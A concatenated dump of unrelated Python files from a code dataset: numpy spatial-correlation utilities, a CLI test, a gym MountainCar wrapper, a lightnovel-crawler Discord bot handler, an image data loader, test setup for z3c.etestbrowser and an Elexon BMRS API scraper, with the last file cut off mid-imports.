","sub_path":"spiders/Russian/spec_rus/rus_sp_8.py","file_name":"rus_sp_8.py","file_ext":"py","file_size_in_byte":11440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"635689268","text":"\"\"\"\nCalculate 2D spatial correlation functions of density, current and orientation\nfileds.\n\n\n\"\"\"\n\nimport numpy as np\n\n\ndef corr2d(u, v=None):\n def autoCorr2d(f):\n F = np.fft.rfft2(f)\n corr = np.fft.irfft2(F * F.conj())\n return corr\n\n if v is None:\n res = autoCorr2d(u) / u.size\n else:\n res = (autoCorr2d(u) + autoCorr2d(v)) / u.size\n res = np.fft.fftshift(res)\n return res\n\n\ndef auto_corr2d(f):\n \"\"\" Calculate the auto-correlation of function f(x, y).\n\n Parameters:\n --------\n f: np.array\n n * n array\n Returns:\n --------\n h: np.array\n Unscaled auto-correlation function, where h[0, 0] is np.sum(f**2)\n \"\"\"\n F = np.fft.rfft2(f)\n h = np.fft.irfft2(F * F.conj())\n return h\n\n\ndef cal_corr(vx, vy, num, dA):\n mask = num > 0\n Jx = vx / dA\n Jy = vy / dA\n rho = num / dA\n module = np.zeros_like(Jx)\n module[mask] = np.sqrt(Jx[mask]**2 + Jy[mask]**2)\n ux = np.zeros_like(Jx)\n uy = np.zeros_like(Jy)\n ux[mask] = Jx[mask] / module[mask]\n uy[mask] = Jy[mask] / module[mask]\n valid_count = corr2d(mask)\n corr_rho = corr2d(rho)\n corr_J = corr2d(Jx, Jy) / valid_count\n corr_u = corr2d(ux, uy) / valid_count\n return corr_rho, corr_J, corr_u\n\n\ndef cal_corr2d(num, vx, vy, vxm=None, vym=None, dA=None, normed_mode=1):\n \"\"\"\n calculate spatial correlation function of density and velocity.\n\n num: np.array\n 2d array of particle number in each grid.\n vx, vy: np.array\n 2d array of velocity in each grid.\n vxm, vym: float\n Mean values of vx, vy.\n dA: float\n Area of one grid.\n normed_mode: int\n The way to normalize correlation functions. Correlation functions is\n divided by 1) the size of input array or 2) the valid counts.\n \"\"\"\n\n rho = num / dA\n if normed_mode == 1:\n mask = num > 0\n valid_count = auto_corr2d(mask)\n elif normed_mode == 2:\n valid_count = auto_corr2d(num)\n else:\n valid_count = rho.size\n C_rho = np.fft.fftshift(auto_corr2d(rho) / valid_count)\n C_v = np.fft.fftshift((auto_corr2d(vx) + auto_corr2d(vy)) / valid_count)\n return C_rho, C_v\n\n\ndef spherical_averaging(corr, L, smoothed=False):\n \"\"\"\n Average correlation function spherically.\n\n Parameters:\n --------\n corr: 2d array\n 2d correlation function.\n L: int\n Size of the system.\n\n Returns:\n --------\n r: 1d array\n 1d array of radius.\n corr_r: 1d array\n Averaged correlation function along the radial direction.\n\n \"\"\"\n nRow, nCol = corr.shape\n dict_count = {}\n dict_cr = {}\n rr_max = ((min(nRow, nCol)) // 2)**2\n for row in range(nRow):\n dy = row - nRow // 2\n for col in range(nCol):\n dx = col - nCol // 2\n rr = dx * dx + dy * dy\n if rr < rr_max:\n if rr in dict_count.keys():\n dict_count[rr] += 1\n dict_cr[rr] += corr[row, col]\n else:\n dict_count[rr] = 1\n dict_cr[rr] = corr[row, col]\n rr_sorted = np.array(sorted(dict_count.keys()))\n r = np.sqrt(rr_sorted) * L / nRow\n corr_r = np.array([dict_cr[key] / dict_count[key] for key in rr_sorted])\n # corr_r /= corr_r[0]\n if smoothed is True:\n r_new, corr_new = [], []\n r_threshold = 10\n i = 0\n while i < r.size:\n if r[i] < 10:\n r_new.append(r[i])\n corr_new.append(corr_r[i])\n i += 1\n else:\n j = i + 1\n while j < r.size and r[j] < r_threshold + 1:\n j += 1\n r_new.append(np.mean(r[i:j]))\n corr_new.append(np.mean(corr_r[i:j]))\n i = j\n r_threshold += 1\n r_new = np.array(r_new)\n corr_new = np.array(corr_new)\n return r_new, corr_new\n else:\n return r, corr_r\n\n\ndef chara_length(r, c_r, threshold=0.5):\n j = -1\n for i in range(r.size):\n if c_r[i] > threshold and c_r[i + 1] <= threshold:\n j = i\n break\n if j < 0:\n Lc = 0\n else:\n Lc = r[j] - (c_r[j] - threshold) * (r[j] - r[j + 1]) / (\n c_r[j] - c_r[j + 1])\n return Lc\n\n\nif __name__ == \"__main__\":\n a = np.array([2, 0, 1, 1, 0, 0, 0, 1])\n A = np.fft.rfft(a)\n h = np.fft.irfft(A * A.conj())\n print(h)\n","sub_path":"spatial_corr.py","file_name":"spatial_corr.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"515440663","text":"import os\n\nfrom unittest import TestCase\n\nfrom elasticsearch import Elasticsearch, NotFoundError\nfrom sqlalchemy.engine.reflection import Inspector\n\nfrom babbage_fiscal.cli import cli\nfrom babbage_fiscal import model_registry, config\n\nfrom click.testing import CliRunner\n\nfrom .test_common import SAMPLE_PACKAGES, LOCAL_ELASTICSEARCH\n\nMODEL_NAME, SAMPLE_PACKAGE = SAMPLE_PACKAGES['md']\n\n\nclass CLITest(TestCase):\n\n def setUp(self):\n \"\"\"\n Set-up a dummy DB for the test\n :return:\n \"\"\"\n self.es = Elasticsearch(hosts=[LOCAL_ELASTICSEARCH])\n try:\n self.es.indices.delete(index='packages')\n except NotFoundError:\n pass\n self.runner = CliRunner()\n self.dbfilename = 'test.db'\n config._set_connection_string('sqlite:///test.db')\n\n def tearDown(self):\n if os.path.exists(self.dbfilename):\n os.unlink(self.dbfilename)\n\n def test_load_fdp_cmd_success(self):\n \"\"\"\n Simple invocation of the load-fdp command\n \"\"\"\n self.runner.invoke(cli,\n args=['load-fdp', '--package', SAMPLE_PACKAGE],\n env={'OS_ELASTICSEARCH_ADDRESS': LOCAL_ELASTICSEARCH})\n self.cm = model_registry.ModelRegistry(self.es)\n self.assertGreater(len(list(self.cm.list_models())), 0, 'no dataset was loaded')\n\n def test_create_tables_cmd_success(self):\n \"\"\"\n Simple invocation of the create-tables command\n \"\"\"\n self.runner.invoke(cli,\n args=['create-tables'],\n env={'OS_ELASTICSEARCH_ADDRESS': LOCAL_ELASTICSEARCH})\n engine = config.get_engine()\n inspector = Inspector.from_engine(engine)\n self.assertTrue('models' not in inspector.get_table_names())\n","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"389279373","text":"import gym\n# from main import render\nnum_input = 2\nnum_output = 3\nmoves = [0,1,2]\nenv_ver = gym.make('MountainCar-v0')\nis_render = False\ndef init_run():\n observation = env_ver.reset()\n return observation\n\ndef main_mountain_car(move,render):\n if move != \"end\":\n if render:\n env_ver.render()\n observation, reward, done, info = env_ver.step(move)\n return observation,reward,done\n\n# agent.reward = ob_reward*1000/step\n# if observation[0] > ob_reward: ob_reward = observation[0]\n# step = 0\n # ob_reward = -math.inf","sub_path":"mountainCar.py","file_name":"mountainCar.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"282382188","text":"# -*- coding: utf-8 -*-\nimport asyncio\nimport logging\nimport os\nimport random\nimport re\nimport shutil\nfrom concurrent.futures import ThreadPoolExecutor\nfrom datetime import datetime\nfrom urllib.parse import quote\n\nimport discord\n\nfrom ...core.app import App\nfrom ...sources import crawler_list\nfrom ...utils.uploader import upload\nfrom .config import max_workers, public_ip, public_path\n\nlogger = logging.getLogger(__name__)\n\navailable_formats = [\n 'epub',\n 'text',\n 'web',\n 'mobi',\n 'pdf',\n 'fb2',\n]\n\ndisable_search = os.getenv('DISCORD_DISABLE_SEARCH') == 'true'\n\n\nclass MessageHandler:\n def __init__(self, client):\n self.app = App()\n self.client = client\n self.state = None\n self.executor = ThreadPoolExecutor(max_workers)\n self.last_activity = datetime.now()\n self.closed = False\n # end def\n\n def process(self, message):\n self.last_activity = datetime.now()\n self.executor.submit(self.handle_message, message)\n # end def\n\n def destroy(self):\n try:\n self.client.handlers.pop(str(self.user.id))\n self.send_sync('Closing current session...')\n self.executor.shutdown(wait=False)\n self.app.destroy()\n # shutil.rmtree(self.app.output_path, ignore_errors=True)\n except Exception:\n logger.exception('While destroying MessageHandler')\n finally:\n self.send_sync('Session closed. Send *start* to start over')\n self.closed = True\n # end try\n # end def\n\n def handle_message(self, message):\n self.message = message\n self.user = message.author\n if not self.state:\n self.state = self.get_novel_url\n # end if\n try:\n self.state()\n except Exception as ex:\n logger.exception('Failed to process state')\n self.send_sync('Something went wrong!\\n`%s`' % str(ex))\n self.executor.submit(self.destroy)\n # end try\n # end def\n\n # ---------------------------------------------------------------------- #\n\n def wait_for(self, async_coroutine):\n asyncio.run_coroutine_threadsafe(\n async_coroutine,\n self.client.loop\n ).result()\n # end def3\n\n async def send(self, *contents):\n if self.closed:\n return\n self.last_activity = datetime.now()\n async with self.user.typing():\n for text in contents:\n if not text:\n continue\n # end if\n await self.user.send(text)\n # end for\n # end with\n # end def\n\n def send_sync(self, *contents):\n self.wait_for(self.send(*contents))\n # end def\n\n def busy_state(self):\n text = self.message.content.strip()\n\n if text == '!cancel':\n self.executor.submit(self.destroy)\n return\n # end if\n\n self.send_sync(random.choice([\n 'Send !cancel to stop this session.',\n 'Please wait...',\n 'Processing, give me more time...',\n 'I am just a bot. Please be patient...',\n 'Waiting for more RAM...',\n 'A little bit longer...',\n 'I\\'ll be with you in a bit...',\n 'Patience! This is difficult, you know...',\n ]))\n # end def\n\n # ---------------------------------------------------------------------- #\n\n def get_novel_url(self):\n self.state = self.busy_state\n if disable_search:\n self.send_sync(\n 'Send me an URL of novel info page with chapter list!'\n )\n else:\n self.send_sync(\n 'I recognize these two categories:\\n'\n '- Profile page url of a lightnovel.\\n'\n '- A query to search your lightnovel.',\n 'What are you looking for?'\n )\n # end if\n self.state = self.handle_novel_url\n # end def\n\n def handle_novel_url(self):\n self.state = self.busy_state\n\n text = self.message.content.strip()\n if text == '!cancel':\n self.executor.submit(self.destroy)\n return\n # end if\n\n try:\n self.app.user_input = self.message.content.strip()\n self.app.init_search()\n except Exception:\n self.send_sync('\\n'.join([\n 'Sorry! I do not recognize this sources yet.',\n 'See list of supported sources here:',\n 'https://github.com/dipu-bd/lightnovel-crawler#c3-supported-sources',\n ]))\n self.get_novel_url()\n # end try\n\n if self.app.crawler:\n self.send_sync('Got your page link')\n self.get_novel_info()\n elif len(self.app.user_input) < 4:\n self.send_sync('Your query is too short')\n self.state = self.handle_novel_url\n self.get_novel_url()\n else:\n if disable_search:\n self.send_sync(\n 'Sorry! I can not do searching.\\n'\n 'Please use Google to find your novel first'\n )\n self.get_novel_url()\n else:\n self.send_sync(\n 'Searching %d sources for \"%s\"\\n' % (\n len(self.app.crawler_links), self.app.user_input),\n )\n self.display_novel_selection()\n # end if\n # end if\n # end def\n\n # ------------------------------------------------------------ #\n # SEARCHING -- skips if DISCORD_DISABLE_SEARCH is 'true'\n # ------------------------------------------------------------ #\n\n def display_novel_selection(self):\n self.app.search_novel()\n if self.closed:\n return\n\n if len(self.app.search_results) == 0:\n self.send_sync('No novels found for \"%s\"' % self.app.user_input)\n self.state = self.handle_novel_url\n elif len(self.app.search_results) == 1:\n self.selected_novel = self.app.search_results[0]\n self.display_sources_selection()\n else:\n self.send_sync('\\n'.join([\n 'Found %d novels:' % len(self.app.search_results)\n ] + [\n '%d. **%s** `%d sources`' % (\n i + 1,\n item['title'],\n len(item['novels'])\n ) for i, item in enumerate(self.app.search_results)\n ] + [\n '',\n 'Enter name or index of your novel.',\n 'Send `!cancel` to stop this session.'\n ]))\n self.state = self.handle_novel_selection\n # end if\n # end def\n\n def handle_novel_selection(self):\n self.state = self.busy_state\n\n text = self.message.content.strip()\n if text.startswith('!cancel'):\n self.get_novel_url()\n return\n # end if\n match_count = 0\n selected = None\n for i, res in enumerate(self.app.search_results):\n if str(i + 1) == text:\n selected = res\n match_count += 1\n elif text.isdigit() or len(text) < 3:\n pass\n elif res['title'].lower().find(text) != -1:\n selected = res\n match_count += 1\n # end if\n # end for\n if match_count != 1:\n self.send_sync(\n 'Sorry! You should select *one* novel from the list (%d selected).' % match_count)\n self.display_novel_selection()\n return\n # end if\n self.selected_novel = selected\n self.display_sources_selection()\n # end def\n\n def display_sources_selection(self):\n novel_list = self.selected_novel['novels']\n self.send_sync('**%s** is found in %d sources:\\n' %\n (self.selected_novel['title'], len(novel_list)))\n\n for j in range(0, len(novel_list), 10):\n self.send_sync('\\n'.join([\n '%d. <%s> %s' % (\n (j + i + 1),\n item['url'],\n item['info'] if 'info' in item else ''\n ) for i, item in enumerate(novel_list[j:j+10])\n ]))\n # end for\n\n self.send_sync('\\n'.join([\n '',\n 'Enter index or name of your source.',\n 'Send `!cancel` to stop this session.',\n ]))\n self.state = self.handle_sources_to_search\n # end def\n\n def handle_sources_to_search(self):\n self.state = self.busy_state\n\n if len(self.selected_novel['novels']) == 1:\n novel = self.selected_novel['novels'][0]\n return self.handle_search_result(novel)\n # end if\n text = self.message.content.strip()\n if text.startswith('!cancel'):\n return self.get_novel_url()\n # end if\n match_count = 0\n selected = None\n for i, res in enumerate(self.selected_novel['novels']):\n if str(i + 1) == text:\n selected = res\n match_count += 1\n elif text.isdigit() or len(text) < 3:\n pass\n elif res['url'].lower().find(text) != -1:\n selected = res\n match_count += 1\n # end if\n # end for\n if match_count != 1:\n self.send_sync(\n 'Sorry! You should select *one* source from the list (%d selected).' % match_count)\n return self.display_sources_selection()\n # end if\n self.handle_search_result(selected)\n # end def\n\n def handle_search_result(self, novel):\n self.send_sync('Selected: %s' % novel['url'])\n self.app.init_crawler(novel['url'])\n self.get_novel_info()\n # end def\n\n # ---------------------------------------------------------------------- #\n\n def get_novel_info(self):\n # TODO: Handle login here\n\n self.send_sync('Getting information about your novel...')\n self.executor.submit(self.download_novel_info)\n # end def\n\n def download_novel_info(self):\n self.state = self.busy_state\n try:\n self.app.get_novel_info()\n if self.closed:\n return\n except Exception as ex:\n logger.exception('Failed to get novel info')\n self.send_sync('Failed to get novel info.\\n`%s`' % str(ex))\n self.executor.submit(self.destroy)\n # end try\n\n # Setup output path\n root = os.path.abspath('.discord_bot_output')\n if public_path and os.path.exists(public_path):\n root = os.path.abspath(public_path)\n # end if\n good_name = os.path.basename(self.app.output_path)\n output_path = os.path.join(root, str(self.user.id), good_name)\n if os.path.exists(output_path):\n shutil.rmtree(output_path, ignore_errors=True)\n # end if\n\n os.makedirs(output_path, exist_ok=True)\n self.app.output_path = output_path\n\n self.display_range_selection()\n # end def\n\n def display_range_selection(self):\n self.send_sync('\\n'.join([\n 'Now you choose what to download:',\n '- Send `!cancel` to stop this session.',\n '- Send `all` to download all chapters',\n '- Send `last 20` to download last 20 chapters. Choose any number you want.',\n '- Send `first 10` for first 10 chapters. Choose any number you want.',\n '- Send `volume 2 5` to download download volume 2 and 5. Pass as many numbers you need.',\n '- Send `chapter 110 120` to download chapter 110 to 120. Only two numbers are accepted.',\n ]))\n self.send_sync(\n '**It has `%d` volumes and `%d` chapters.**' % (\n len(self.app.crawler.volumes),\n len(self.app.crawler.chapters)\n )\n )\n self.state = self.handle_range_selection\n # end def\n\n def handle_range_selection(self):\n self.state = self.busy_state\n text = self.message.content.strip().lower()\n if text == '!cancel':\n self.executor.submit(self.destroy)\n return\n # end if\n\n if text == 'all':\n self.app.chapters = self.app.crawler.chapters[:]\n elif re.match(r'^first(\\s\\d+)?$', text):\n text = text[len('first'):].strip()\n n = int(text) if text.isdigit() else 50\n n = 50 if n < 0 else n\n self.app.chapters = self.app.crawler.chapters[: n]\n elif re.match(r'^last(\\s\\d+)?$', text):\n text = text[len('last'):].strip()\n n = int(text) if text.isdigit() else 50\n n = 50 if n < 0 else n\n self.app.chapters = self.app.crawler.chapters[-n:]\n elif re.match(r'^volume(\\s\\d+)+$', text):\n text = text[len('volume'):].strip()\n selected = re.findall(r'\\d+', text)\n self.send_sync(\n 'Selected volumes: ' + ', '.join(selected),\n )\n selected = [int(x) for x in selected]\n self.app.chapters = [\n chap for chap in self.app.crawler.chapters\n if selected.count(chap['volume']) > 0\n ]\n elif re.match(r'^chapter(\\s\\d+)+$', text):\n text = text[len('chapter'):].strip()\n pair = text.split(' ')\n if len(pair) == 2:\n def resolve_chapter(name):\n cid = 0\n if name.isdigit():\n cid = int(name)\n else:\n cid = self.app.crawler.get_chapter_index_of(name)\n # end if\n return cid - 1\n # end def\n first = resolve_chapter(pair[0])\n second = resolve_chapter(pair[1])\n if first > second:\n second, first = first, second\n # end if\n if first >= 0 or second < len(self.app.crawler.chapters):\n self.app.chapters = self.app.crawler.chapters[first: second]\n # end if\n # end if\n if len(self.app.chapters) == 0:\n self.send_sync('Chapter range is not valid. Please try again')\n self.state = self.handle_range_selection\n return\n # end if\n else:\n self.send_sync(\n 'Sorry! I did not recognize your input. Please try again')\n self.state = self.handle_range_selection\n return\n # end if\n\n if len(self.app.chapters) == 0:\n self.send_sync(\n 'You have not selected any chapters. Please select at least one')\n self.state = self.handle_range_selection\n return\n # end if\n\n self.send_sync('Got your range selection')\n self.display_output_selection()\n # end def\n\n def display_output_selection(self):\n self.state = self.busy_state\n self.send_sync('\\n'.join([\n 'Now you can choose book formats to download:',\n '- Send `!cancel` to stop.',\n # '- Send `!all` to download all formats _(it may take a very very long time!)_',\n 'To select specific output formats:',\n '- Send `pdf` to download only pdf format',\n '- Send `epub pdf` to download both epub and pdf formats.',\n '- Send `{space separated format names}` for multiple formats',\n 'Available formats: `' + '` `'.join(available_formats) + '`',\n ]))\n self.state = self.handle_output_selection\n # end def\n\n def handle_output_selection(self):\n self.state = self.busy_state\n\n text = self.message.content.strip()\n if text.startswith('!cancel'):\n self.get_novel_url()\n return\n # end if\n\n output_format = set(re.findall(\n '|'.join(available_formats), text.lower()))\n if not len(output_format):\n output_format = set(available_formats)\n self.send_sync('Sorry! I did not recognize your input. ' +\n 'By default, I shall generate in (%s) formats.' % (', ' .join(output_format)))\n # end if\n\n self.app.output_formats = {x: (x in output_format)\n for x in available_formats}\n self.send_sync('I will generate e-book in (%s) format' %\n (', ' .join(output_format)))\n\n self.send_sync('\\n'.join([\n 'Starting download...',\n 'Send anything to view status.',\n 'Send `!cancel` to stop it.',\n ]))\n\n self.executor.submit(self.start_download)\n # end def\n\n # ---------------------------------------------------------------------- #\n\n def start_download(self):\n self.app.pack_by_volume = False\n\n try:\n self.send_sync(\n '**%s**' % self.app.crawler.novel_title,\n 'Downloading %d chapters...' % len(self.app.chapters),\n )\n self.app.start_download()\n self.send_sync('Download complete.')\n if self.closed:\n return\n\n self.send_sync('Binding books...')\n self.app.bind_books()\n self.send_sync('Book binding completed.')\n if self.closed:\n return\n\n self.send_sync('Compressing output folder...')\n self.app.compress_books()\n self.send_sync('Compressed output folder.')\n if self.closed:\n return\n\n if public_ip and public_path and os.path.exists(public_path):\n self.send_sync('Publishing files...')\n self.publish_files()\n else:\n self.send_sync('Uploading files...')\n for archive in self.app.archived_outputs:\n self.upload_file(archive)\n # end for\n # end if\n except Exception as ex:\n logger.exception('Failed to download')\n self.send_sync('Download failed!\\n`%s`' % str(ex))\n self.executor.submit(self.destroy)\n finally:\n self.executor.submit(self.destroy)\n # end try\n # end def\n\n def publish_files(self):\n try:\n download_url = '%s/%s/%s' % (public_ip.strip('/'),\n quote(str(self.user.id)),\n quote(os.path.basename(self.app.output_path)))\n self.send_sync('Download files from:\\n' + download_url)\n except Exception:\n logger.exception('Fail to publish')\n # end try\n # end def\n\n def upload_file(self, archive):\n # Check file size\n file_size = os.stat(archive).st_size\n if file_size > 7.99 * 1024 * 1024:\n self.send_sync(\n 'File %s exceeds 8MB. Uploading To Google Drive.' % os.path.basename(archive))\n description = 'Generated By : Discord Bot Ebook Smelter'\n link_id = upload(archive, description)\n if link_id:\n self.send_sync('https://drive.google.com/open?id=%s' % link_id)\n else:\n self.send_sync('Failed to upload to google drive')\n # end if\n else:\n # Upload small files to discord directly\n k = 0\n while(file_size > 1024 and k < 3):\n k += 1\n file_size /= 1024.0\n # end while\n self.send_sync(\n 'Uploading %s [%d%s] ...' % (\n os.path.basename(archive),\n int(file_size * 100) / 100.0,\n ['B', 'KB', 'MB', 'GB'][k]\n )\n )\n self.wait_for(\n self.user.send(\n file=discord.File(\n open(archive, 'rb'),\n os.path.basename(archive)\n )\n )\n )\n # end if\n # end def\n# end class\n","sub_path":"lncrawl/bots/discord/message_handler.py","file_name":"message_handler.py","file_ext":"py","file_size_in_byte":20107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"270054279","text":"from conf import *\n\nIMAGE_RESIZE_SIZE = 64\n\n\n# read the train and test data\n\ndef load_csv():\n print('Loading CSV data...')\n train_csv = pandas.read_csv(DATA_PATH + '/train.csv') # (990, 194)\n test_csv = pandas.read_csv(DATA_PATH + '/test.csv') # (594, 193)\n\n return train_csv, test_csv\n\n\ndef load_train_labels():\n train_csv, test_csv = load_csv()\n le = LabelEncoder()\n le.fit(train_csv.species)\n train_labels_raw = le.transform(train_csv.species)\n # Convert class vectors to binary class matrices (one-hot encoding)\n train_labels = keras.utils.to_categorical(train_labels_raw, 99)\n\n return train_labels\n\n\ndef load_pre_extracted_features(standardize=False):\n train_csv, test_csv = load_csv()\n\n # get the pre-extracted features\n train_feat = train_csv.copy()\n test_feat = test_csv.copy()\n train_feat = train_feat.drop(['id', 'species'], axis=1)\n test_feat = test_feat.drop(['id'], axis=1)\n\n if standardize is True:\n # Standardize features by removing the mean and scaling to unit variance\n train_feat = StandardScaler().fit(train_feat).transform(train_feat) # (990, 192)\n test_feat = StandardScaler().fit(test_feat).transform(test_feat) # (594, 192)\n else:\n train_feat = train_feat.as_matrix()\n test_feat = test_feat.as_matrix()\n\n print('train_feat shape', train_feat.shape)\n print('test_feat shape', test_feat.shape)\n\n return train_feat, test_feat\n\n\ndef load_image_data_resize_directly():\n print('Loading images data...')\n image_data = {}\n for img_file in os.listdir(DATA_PATH + '/images'):\n resized_img = imresize(imread(DATA_PATH + '/images/' + img_file),\n (IMAGE_RESIZE_SIZE, IMAGE_RESIZE_SIZE)).astype(np.float32)\n image_data[img_file.split(\".\")[0]] = resized_img\n\n return image_data\n\n\ndef load_image_data_padded_and_resize():\n print('Loading images data...')\n image_data = {}\n for img_file in os.listdir(DATA_PATH + '/images'):\n img = imread(DATA_PATH + '/images/' + img_file)\n h, w = img.shape\n max_dim = max(h, w)\n padded_img = np.lib.pad(img,\n (((max_dim - h) // 2, max_dim - h - (max_dim - h) // 2),\n ((max_dim - w) // 2, max_dim - w - (max_dim - w) // 2)),\n 'constant', constant_values=1)\n resized_img = imresize(padded_img, (IMAGE_RESIZE_SIZE, IMAGE_RESIZE_SIZE)).astype(np.float32)\n image_data[img_file.split(\".\")[0]] = resized_img\n\n return image_data\n","sub_path":"Models/data_reader.py","file_name":"data_reader.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"447788375","text":"##############################################################################\n#\n# Copyright (c) 2006 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.0 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Testing for z3c.etestbrowser\n\n$Id$\n\"\"\"\n\nfrom zope.app.testing import functional\nimport doctest\nimport os.path\nimport unittest\nimport z3c.etestbrowser\nimport zope.app.wsgi.testlayer\n\n\nlayer = functional.ZCMLLayer(\n os.path.join(os.path.split(__file__)[0], 'ftesting.zcml'),\n __name__, 'ETestBrowserLayer', allow_teardown=True)\n\nwsgi_layer = zope.app.wsgi.testlayer.BrowserLayer(z3c.etestbrowser, allowTearDown=True)\n\ndef setUpWSGI(test):\n test.globs['wsgi_app'] = wsgi_layer.make_wsgi_app()\n\n\ndef test_suite():\n suite = unittest.TestSuite()\n\n test = functional.FunctionalDocFileSuite(\n \"README.txt\",\n \"over_the_wire.txt\",\n optionflags=doctest.REPORT_NDIFF|doctest.NORMALIZE_WHITESPACE|\n doctest.ELLIPSIS)\n test.layer = layer\n suite.addTest(test)\n\n wsgi_test = doctest.DocFileSuite(\n \"wsgi.txt\",\n setUp=setUpWSGI,\n optionflags=doctest.NORMALIZE_WHITESPACE|doctest.ELLIPSIS)\n wsgi_test.layer = wsgi_layer\n suite.addTest(wsgi_test)\n return suite\n","sub_path":"src/z3c/etestbrowser/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"416600846","text":"\"\"\"\n\n\"\"\"\nimport argparse\nfrom collections import defaultdict, namedtuple\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport requests\nimport xml.etree.ElementTree as ET\n\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n\ndef get_dates(start_date, days):\n \"\"\"\n Creates a list of dates\n\n args\n start_date (str)\n days (int) number of days after start date\n\n returns\n dates (list) list of strings\n \"\"\"\n start_date = dt.strptime(start_date, '%Y-%m-%d')\n dates = []\n for day in range(days):\n dates.append(start_date + timedelta(days=day))\n return dates\n\n\nclass ReportGrabber(object):\n \"\"\"\n Grabs data from Elexon\n\n args\n name (str) name of the Elexon report\n data_cols (list) list of columns to get for the report\n key (str) API key\n \"\"\"\n def __init__(self, name, data_cols, key):\n self.name = name\n\n assert isinstance(data_cols, list)\n self.data_cols = data_cols\n\n self.columns = ['settlementDate', 'settlementPeriod']\n self.columns.extend(data_cols)\n\n self.key = key\n\n def scrape_report(self, settlement_date):\n \"\"\"\n Gets data for one settlement date\n\n args\n settlement_date (str)\n\n returns\n output (dict) {column name : data}\n \"\"\"\n url = self.get_url(settlement_date)\n print('scraping {} {}'.format(self.name, settlement_date))\n\n # use the requests library to get the response from this url\n req = requests.get(url)\n\n if 'An invalid API key has been passed' in req.text:\n raise ValueError('Invalid API key')\n\n self.root = ET.fromstring(req.content)\n\n # iterate over the XML\n # save each of the columns into a dict\n output = defaultdict(list)\n\n # we can narrow down where we need to look in this XML\n for parent in self.root.findall(\"./responseBody/responseList/item\"):\n\n for child in parent:\n\n # condition that only gets the data we want\n # if we wanted all raw data we wouldn't do this\n if child.tag in self.columns:\n output[child.tag].append(child.text)\n\n return output\n\n def create_dataframe(self, output_dict):\n \"\"\"\n Creates a dataframe from the output dictionary\n Will create a dataframe for one settlement_date, as the output_dict\n will be data for one settlement_date\n\n args\n output_dict (dict) {column name : data}\n\n returns\n output (DataFrame)\n \"\"\"\n # create a dataframe\n output = pd.DataFrame().from_dict(output_dict)\n\n # create the time stamp by iterating over each row\n # there must be a better way!\n for row_idx in range(output.shape[0]):\n\n date = dt.strptime(output.loc[row_idx, 'settlementDate'], '%Y-%m-%d')\n stamp = date + timedelta(minutes=30*int(output.loc[row_idx, 'settlementPeriod']))\n output.loc[row_idx, 'time_stamp'] = stamp\n\n output.loc[:, 'time_stamp'] = pd.to_datetime(output.loc[:, 'time_stamp'])\n\n output.index = output.loc[:, 'time_stamp']\n output.drop('time_stamp', inplace=True, axis=1)\n\n # iterating through the XML creates duplicates - not sure why\n # here we drop duplicates and sort the index\n output.drop_duplicates(inplace=True)\n output.sort_index(inplace=True)\n\n # finally we set the dype of the columns correctly\n for col in self.data_cols:\n output.loc[:, col] = pd.to_numeric(output.loc[:, col])\n output = output.loc[:, self.data_cols]\n return output\n\n def get_url(self, settlement_date):\n \"\"\"\n Forms the URL to query the Elexon API\n\n args\n settlement_date (str)\n\n returns\n url (str)\n \"\"\"\n url = 'https://api.bmreports.com/BMRS/{}/'.format(self.name)\n url += 'v1?APIKey={}&'.format(self.key)\n url += 'ServiceType=xml&'\n url += 'Period=*&SettlementDate={}'.format(settlement_date)\n return url\n\n\nif __name__ == '__main__':\n # send in the ELEXON API key from the command line\n parser = argparse.ArgumentParser()\n parser.add_argument('--key')\n args = parser.parse_args()\n key = args.key\n\n # the reports we want data for\n # format of {name: columns}\n reports = {'B1770': ['imbalancePriceAmountGBP'],\n 'B1780': ['imbalanceQuantityMAW']}\n\n # the dates we want data for\n settlementdates = get_dates('2015-01-01', 3*365)\n\n # report data is a global list our data\n report_data = []\n for name, cols in reports.items():\n report = ReportGrabber(name, cols, key)\n\n # dataframes is a list of reports for each date\n dataframes = []\n for date in settlementdates:\n output_dict = report.scrape_report(date)\n dataframes.append(report.create_dataframe(output_dict))\n\n all_dates = pd.concat(dataframes, axis=0)\n report_data.append(all_dates)\n\n report_data = pd.concat(report_data, axis=1)\n print('report data starts at {}'.format(report_data.index[0]))\n print('report data ends at {}'.format(report_data.index[-1]))\n print(report_data.head())\n print(report_data.describe())\n\n report_data.to_csv('elexon_data/elexon_report_data.csv')\n","sub_path":"elexon_data_scraping.py","file_name":"elexon_data_scraping.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"460355564","text":"import numpy as np\nfrom keras.optimizers import SGD\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom trainer.datasets import get_data\nfrom trainer.models import get_model\nimport time\nimport argparse\nfrom tensorflow.python.lib.io import file_io\nfrom keras.datasets import cifar10, mnist, cifar100\nfrom keras.utils import np_utils\nfrom trainer.EPD import LossLearningRateScheduler\nfrom 